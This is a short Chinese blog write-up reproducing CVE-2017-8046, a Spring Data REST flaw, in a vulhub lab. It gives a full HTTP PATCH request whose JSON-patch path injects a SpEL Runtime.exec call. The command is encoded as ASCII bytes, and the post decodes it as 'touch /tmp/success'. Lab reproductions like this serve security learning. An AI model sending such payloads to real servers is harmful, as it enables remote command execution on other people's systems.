靶场环境
vulhub/spring/CVE-2017-8046
漏洞复现
1. 访问http://172.16..52:8080/customers/1
2.抓取数据包,使⽤PATCH请求来修改
PATCH /customers/1 HTTP/1.1
Host: 47.113.231.0:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 200
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,11
5} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码
3.进⼊docker容器内查看是否执⾏命令
扫一扫
3354
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
